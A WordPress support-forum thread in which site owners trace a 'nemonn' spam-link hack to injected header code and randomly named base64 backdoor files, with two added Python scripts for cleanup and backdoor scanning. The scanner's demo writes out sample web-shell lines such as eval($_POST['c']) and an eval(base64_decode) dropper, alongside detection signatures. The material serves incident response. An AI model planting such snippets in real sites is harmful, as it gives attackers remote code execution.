
[closed] Site hacked - nemonn tag infected with scam description (23 posts)

  1. danihunt
    Member
    Posted 2 years ago #

    Hi & thank you for your help. I understand basic html & css but am no guru so please keep it simple if possible :)

    I have 2 sites running on wordpress... frances-hunt.com & danihunt.com. They are on the same server. Both sites have been hacked. Basically, a 'nemonn' tag has been added, with scam text about money loaning. This is now showing up as the site description when I post to sites like Facebook. I'm eager to get rid of it!

    If you visit the sites and click 'view source' you can see the problem half way down. I have opened up every file I can in search of the text but can't find it anywhere to delete it. How can I find it and remove it?

    Just a quick note too that I went to great length to make the log-in secure, installing wp-admin in a secondary folder and creating secure passwords, so I think this code was added without hacking in using logins and passwords. Any idea how I can prevent it in the future?

    Thank you so much for your time and brains! Dani.

  2. WPyogi
    Forum Moderator
    Posted 2 years ago #

  3. kennyknapp
    Member
    Posted 2 years ago #

    just wanted to chime in and say I was having the same problem. still working on a solution.

  4. @danihunt and @kennyknapp:

    It probably has a lot to do with GoDaddy. Shared hosts can allow hack vectors from other insecure shared accounts on the same server. GoDaddy is not generally considered to be a secure host.

  5. kennyknapp
    Member
    Posted 2 years ago #

    fixed it:

    Looks like the spam-bot (or whatever) added the code to the header.php file of the active theme. It was no big deal to remove everything between the tags: <!--start-add-div-content--> and <!--end-add-div-content--> right before the <body> tag.

    @songdogtech - yep, shared hosting can be a treacherous place but, to my knowledge, my client's site is not hosted on GoDaddy or anywhere in their upstream (WildWestDomains, etc.); just fyi.
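The post above describes removing everything between the two marker comments in the active theme's header.php. The script below is an added example (not code from the thread, and not part of WordPress) that does the same thing across a whole theme directory: it assumes the markers appear exactly as quoted, keeps a .bak copy of every file it changes, runs as a dry run unless told otherwise, and refuses to touch a file whose start marker has no matching end marker, so a truncated injection is never half-removed. The sample header.php contents are constructed to mirror the symptom, not a real capture.

```python
import re
import tempfile
from pathlib import Path

# Marker comments exactly as quoted in the post above; the injected HTML sits between them.
START = "<!--start-add-div-content-->"
END = "<!--end-add-div-content-->"

# Non-greedy so several injected spans in one file are matched separately;
# DOTALL because the injected block spans lines.
INJECT_RE = re.compile(re.escape(START) + r".*?" + re.escape(END), re.DOTALL)


def strip_injected_block(html):
    """Remove every START..END span from a string.

    Returns (cleaned, removed_spans, orphan_start). A START with no matching END
    is left in place and flagged instead of being silently cut."""
    removed = INJECT_RE.findall(html)
    cleaned = INJECT_RE.sub("", html)
    return cleaned, removed, START in cleaned


def clean_php_file(path, dry_run=True):
    """Clean one file in place, keeping a .bak copy. Returns the number of spans removed."""
    original = path.read_text(encoding="utf-8", errors="replace")
    cleaned, removed, orphan = strip_injected_block(original)
    if orphan:
        raise ValueError(f"{path}: start marker without end marker, inspect by hand")
    if removed and not dry_run:
        Path(str(path) + ".bak").write_text(original, encoding="utf-8")
        path.write_text(cleaned, encoding="utf-8")
    return len(removed)


def scan_theme_dir(theme_dir, dry_run=True):
    """Walk every .php file under a theme and return {relative_path: spans_removed}."""
    hits = {}
    for php in sorted(Path(theme_dir).rglob("*.php")):
        n = clean_php_file(php, dry_run)
        if n:
            hits[php.relative_to(theme_dir).as_posix()] = n
    return hits


# Constructed sample in the shape the thread describes (hidden div with a loan link); not a real capture.
SAMPLE_HEADER = """<?php /* header.php */ ?>
<html>
<head><title>Example</title></head>
<!--start-add-div-content--><div style="position:absolute;left:-9999px">
<a href="http://example.invalid/loans">instant money loans</a></div><!--end-add-div-content-->
<body>
"""


def demo(dry_run=False):
    """Build a throwaway theme directory, clean it, and return (hits, header_after)."""
    theme = Path(tempfile.mkdtemp())
    (theme / "header.php").write_text(SAMPLE_HEADER, encoding="utf-8")
    (theme / "footer.php").write_text("<?php wp_footer(); ?>\n", encoding="utf-8")
    hits = scan_theme_dir(theme, dry_run=dry_run)
    return hits, (theme / "header.php").read_text(encoding="utf-8")


if __name__ == "__main__":
    hits, after = demo()
    print("cleaned:", hits)
    print(after)
```

Run it first with dry_run=True to see which theme files carry the markers before anything is written. As later posts in this thread point out, removing this span only fixes the symptom; the backdoor that wrote it is a separate file and has to be found on its own.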

  6. @kennyknapp: @danihunt is on GoDaddy. And "WildWestDomains" sounds about as reliable as GoDaddy. If you only removed that spam link, you haven't done a complete job of cleaning the hack.

  7. kennyknapp
    Member
    Posted 2 years ago #

    @songdogtech: after removing the injected code, there doesn't appear to be any residual problem in any theme functions.php file and I've also re-installed the WP 3.4.2 files. We're going to follow the additional recommendations at http://codex.wordpress.org/FAQ_My_site_was_hacked. What other resources do you advise for securing a WP installation?

  8. Read the standard links that we all recommend, like WPyogi posted above.

  9. Bev
    Member
    Posted 2 years ago #

    I got this hack as well with Netfirms hosting.

  10. WPyogi
    Forum Moderator
    Posted 2 years ago #

    Same advice applies -- hacks are not always limited to one host by any means, though it's common for them to affect multiple sites on shared servers.

  11. Bev
    Member
    Posted 2 years ago #

    More info on this hack can be found here: http://wordpress.org/support/topic/hackedmalware-need-help-please

  12. GranPaSmurf
    Member
    Posted 2 years ago #

Me too. I have about a dozen sites on GoDaddy. I thought they were pretty reliable at preventing cross-server hacks. I guess I got the wrong memo.
    The hacked site has the 'nemonn' verbiage. I can't tell if it's a phishing site, but it makes no difference; I need to cure it. I am working through the instructions posted here; so far the scanners are not catching it.
    I am confounded by Secret Security Keys. I had never heard of them and don't yet know what to do about them.

  13. willt87
    Member
    Posted 2 years ago #

    A client of mine was hacked with 'neonmm' in recent days on GoDaddy hosting.

    I found a base64_decode file called upgrade-merrili-janean.php in the core wp-admin directory, which I'm pretty sure is connected.

    Hope this helps someone.

  14. willt87
    Member
    Posted 2 years ago #

    This is what I have found out about "nemonn"

    Just removing the obfuscated javascript from the header will not work permanently.

    There will be an additional base64 coded file elsewhere (the backdoor)- and possibly more than one. They seem to be located in the core wp-admin directory and are randomly named but seem to follow the update-randomname-randomname.php taxonomy.

    Just updating / reinstalling WordPress from the admin won't remove this file.

    Additionally you should follow guidance given elsewhere for changing ALL passwords (FTP, database and WordPress admins) and follow instructions for Hardening WordPress.

  15. @willt87 said:

    Just removing the obfuscated javascript from the header will not work permanently.

    Yes, one needs to read all the links posted by @WPyogi above to completely clean the hack.

  16. Bev
    Member
    Posted 2 years ago #

    FWIW - my base64 backdoor was named weather-de.php and was found under "plugins".

  17. sitenorth
    Member
    Posted 2 years ago #

    Just found this on 2 sites (on a server with maybe 8 installs, and it is godaddy host if that matters).

    Domain A, 3 php files found in WP-ADMIN
    class-dierdre-gregory.php
    class-ftp-vivian-cry.php
    theme-sybyl-agree.php

    Domain B, 1 php file found in WP-ADMIN/IMAGES
    arrows-babb-gateau.php

    Both sites have a google cache from Dec 6th and were clean, nothing was added/removed to these sites EXCEPT the 3.5 WP update this week.

    Removed said php files, and input added to header, now to go do a full clean and search.

  18. aguidaequesabe
    Member
    Posted 2 years ago #

    I don't know if it helps, but I had/have the same problem and found these:

    wp-admin > images > menu-bits-fraught-reprise.php
    wp-admin > instal-ranging-pummel.php
    wp-includes > class-skill-indemnify.php

    (I seriously hope I didn't delete anything I shouldn't, I'm a newbie)

    This appeared one or two weeks ago, before the 3.5 WP update, on Godaddy host.

  19. masonictraveler
    Member
    Posted 2 years ago #

Had this same problem a week or so back. The intrusion/hack came in through a compromised plugin, the G-Translate plugin (this one, WP Translate 4.0.1 if memory serves: http://wordpress.org/extend/plugins/wp-translate/).

    It was tough to find and I couldn't see it in the theme editor (it had dropped the text and link URL into the head, just above the content). The only real reason I found it was because they had forgotten to close the font size tag and it overrode my entire theme, telling me there was an issue.

    Ended up going through my host who checked my account and found the intrusion.

    Long story short, exploited plugin.

  20. kledoux
    Member
    Posted 2 years ago #

    I found 3 base64 files on each of my sites that were hacked. (3 sites)
    All with names similar to aguidaequesabe. All were on GoDaddy as well.
    In addition to the code inserted into the header file, I found several "index.php" files around that had the following eval code inserted

    function gpc_15674($l15676){i [code moderated] rray_map("gpc_15674",$_SERVER);
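Posts 13, 14, 16, 17, 18 and 20 together give a usable picture of where the persistence lives: randomly named PHP files dropped into wp-admin, wp-admin/images, wp-includes or a plugin directory, containing base64-decoded eval payloads, plus index.php files that run every entry of $_SERVER through a decoder function, which means the actual command arrives in an HTTP request header rather than sitting in any file. The scanner below is an added example (not from the thread, not a WordPress tool) that turns those observations into a scored sweep of an install. It assumes you can supply a manifest of the .php paths that belong to a clean copy of the same WordPress version (for example, the file list from a freshly unpacked download); the weights, the threshold, the signature patterns and the sample tree it builds are all constructed for illustration, with two of the file names taken from the reports above.

```python
import re
import tempfile
from pathlib import Path

# Content signatures drawn from the symptoms reported in this thread. Each adds a weight.
SIGNATURES = [
    (re.compile(r"\beval\s*\(", re.I), 3, "eval("),
    (re.compile(r"\bbase64_decode\s*\(", re.I), 2, "base64_decode("),
    (re.compile(r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 2, "decoder call"),
    # The index.php pattern from post 20: array_map("fn", $_SERVER) feeds every header/env value to fn.
    (re.compile(r"\barray_map\s*\(\s*['\"]\w+['\"]\s*,\s*\$_SERVER\b", re.I), 4, "array_map over $_SERVER"),
]

# Filename shape reported above: a core-looking word followed by two or more random words.
RANDOM_NAME_RE = re.compile(r"^[a-z]+(?:-[a-z]+){2,}\.php$")


def score_file(path, root, manifest):
    """Score one .php file; returns {"path", "score", "reasons"} relative to the install root."""
    rel = path.relative_to(root).as_posix()
    text = path.read_text(encoding="utf-8", errors="replace")
    score, reasons = 0, []
    for rx, weight, label in SIGNATURES:
        if rx.search(text):
            score += weight
            reasons.append(label)
    parts = rel.split("/")
    # Core directories should contain only files from the clean manifest.
    if parts[0] in ("wp-admin", "wp-includes") and rel not in manifest:
        score += 5
        reasons.append("not in core manifest")
    # PHP has no business inside an images directory (posts 17 and 18).
    if "images" in parts[:-1]:
        score += 3
        reasons.append("PHP inside an images directory")
    if RANDOM_NAME_RE.match(path.name) and rel not in manifest:
        score += 2
        reasons.append("random-looking name")
    return {"path": rel, "score": score, "reasons": reasons}


def scan(root, manifest, threshold=4):
    """Scan every .php file under root; return findings at or above threshold, highest score first."""
    root = Path(root)
    findings = [score_file(p, root, manifest) for p in root.rglob("*.php")]
    return sorted((f for f in findings if f["score"] >= threshold), key=lambda f: -f["score"])


def demo():
    """Build a constructed WordPress-like tree in a temp dir and scan it (sample data, not a capture)."""
    root = Path(tempfile.mkdtemp())
    files = {
        # legitimate core file, listed in the manifest
        "wp-admin/admin.php": "<?php require_once 'admin-header.php';\n",
        # core code may legitimately call base64_decode; the manifest keeps it below threshold
        "wp-includes/class-wp-legit.php": "<?php $x = base64_decode($data);\n",
        # dropper named as in post 13, payload constructed
        "wp-admin/upgrade-merrili-janean.php": "<?php eval(base64_decode('aWYoMSl7fQ=='));\n",
        # PHP inside wp-admin/images, named as in post 17
        "wp-admin/images/arrows-babb-gateau.php": "<?php @eval($_POST['c']);\n",
        # the index.php decoder shape from post 20
        "wp-content/uploads/index.php": (
            "<?php\nfunction gpc_15674($l){ if(strlen($l)>40) eval(base64_decode($l)); }\n"
            "array_map(\"gpc_15674\",$_SERVER);\n"
        ),
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body, encoding="utf-8")
    manifest = {"wp-admin/admin.php", "wp-includes/class-wp-legit.php"}
    return scan(root, manifest)


if __name__ == "__main__":
    for f in demo():
        print(f["score"], f["path"], ", ".join(f["reasons"]))
```

The manifest check is what keeps the scan honest: WordPress core itself contains base64_decode calls, so content signatures alone produce noise, while a file in wp-admin that a clean copy does not ship is suspicious even before its contents are read. Files the scan flags should be quarantined and compared against the clean copy rather than deleted on sight, and, as post 14 says, every password (FTP, database, admin) still needs changing afterwards.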

  21. jwurster
    Member
    Posted 2 years ago #

  22. sitenorth
    Member
    Posted 2 years ago #

    This hack returned this week to our sites.

    All extra files were removed, we were 100% clean, yet it's back again.

    Hosted at godaddy.

  23. esmi
    Forum Moderator
    Posted 2 years ago #

    @sitenorth: As per the Forum Welcome, please post your own topic. Posting in an existing topic prevents us from being able to track issues by topic. Added to which, your problem - despite any similarity in symptoms - is likely to be completely different.

This topic has been closed to new replies.